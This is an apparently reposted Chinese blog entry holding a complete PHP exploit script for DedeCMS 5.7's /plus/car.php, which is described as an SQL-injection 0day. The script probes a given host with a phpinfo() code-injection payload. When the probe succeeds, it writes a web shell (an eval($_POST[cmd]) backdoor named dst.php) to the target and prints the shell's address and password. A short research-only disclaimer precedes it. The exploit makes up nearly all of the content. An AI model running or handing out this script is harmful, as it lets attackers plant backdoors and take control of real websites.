• 织梦(dedecms) 5.7 /plus/car.php sql注入0day

    测试方法:

    @Sebug.net   dis
    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
      1. <?php
      2. $host=$argv[1];
      3. $path=$argv[2];
      4. $path=$path."plus/car.php";
      5. $url=$path;
      6. if(count($argv)<3){
      7. print_r('
      8. Usage: php '.$argv[0].' host path
      9. Example:
      10. php '.$argv[0].' www.site.com /dede/
      11. 作者:舞林 http://t.qq.com/wulinlw
      12. 修改:小逸
      13. ');
      14. exit;
      15. }
      16. $data='$a=${@phpinfo()};';
      17. $buffer = POST($host,80,$url,$data,30);
      18. preg_match("/allow_url_fopen/i", $buffer, $arr_suc);
      19.  
      20. $str="allow_url_fopen";
      21. if($arr_suc[0]==$str){
      22. echo "Congratulations,target exist this bug. ";
      23. $data='$a=${@file_put_contents("dst.php","<?php eval($_POST[cmd]); ?>")};';
      24. $buffer = POST($host,80,$url,$data,30);
      25. echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
      26. }
      27. else {
      28. echo "Sorry,target may not exist this bug.";
      29. exit;
      30. }
      31. function POST($host,$port,$path,$data,$timeout, $cookie='') {
      32. $buffer='';
      33. $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
      34. if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
      35. else {
      36. fputs($fp, "POST $path HTTP/1.0 ");
      37. fputs($fp, "Host: $host ");
      38. fputs($fp, "Content-type: application/x-www-form-urlencoded ");
      39. fputs($fp, "Content-length: ".strlen($data)." ");
      40. fputs($fp, "Connection: close ");
      41. fputs($fp, $data." ");
      42.  
      43. while(!feof($fp))
      44. {
      45. $buffer .= fgets($fp,4096);
      46. }
      47. fclose($fp);
      48. }
      49. return $buffer;
      50. }
      51. ?>
      52. 摘自:http://sebug.net/vuldb/ssvid-60162
  • 相关阅读:
    互联网对实体经济的三轮冲击
    虎嗅网
    RabbitMQ实战-死信队列
    RabbitMQ实战
    Hadoop之MapReduce流程
    Hadoop之HDFS读写流程
    GitHub预览网页[2019最新]
    Java操作Hadoop集群
    Hadoop分布式集群搭建
    Hadoop Local(本地)模式搭建
  • 原文地址:https://www.cnblogs.com/milantgh/p/3615919.html
Copyright © 2020-2023  润新知